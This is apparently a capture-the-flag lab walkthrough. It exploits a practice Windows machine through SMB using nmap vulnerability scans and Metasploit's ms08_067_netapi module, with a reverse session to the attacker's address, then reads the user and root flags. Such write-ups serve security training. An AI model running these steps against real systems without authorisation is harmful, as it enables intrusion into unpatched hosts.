As usual let's start with nmap:
nmap -sV -sC 10.129.1.111
We are told to use -Pn so let's try that
nmap -Pn -sC 10.129.1.111
Port 445 is open which is SMB so let's check it with:
smbclient -L 10.129.1.111
It doesn't seem to be working so let's move on. Let's use nmap again but this time looking for any vulnerabilities on port 445
nmap -Pn -p 445 --script vuln 10.129.1.111
Let's see if metasploit got an exploit available for ms08-067
msfconsole
Now let's type:
search ms08-067
There is 1 exploit so let's use this one
use exploit/windows/smb/ms08_067_netapi
show options
Looks like we only need to set up LHOST and RHOSTS as LPORT and RPORT are already setup to the default.
set LHOST 10.10.14.10
This is the IP of the attacker so your IP. If you don't know IP, open a new command prompt and type ifconfig
set RHOSTS 10.129.1.111
This is the IP of the remote host, so the target machine
Type:
exploit
Now we are in!
Type:
cd "Documents and Settings"
ls
cd john
cd Desktop
ls
cat user.txt
Congratulations! You got the user flag!
Now let's go get the root flag. Type:
cd "Documents and Settings"
cd Administrator
ls
cat root.txt
Congratulations! You got the root flag!
Comments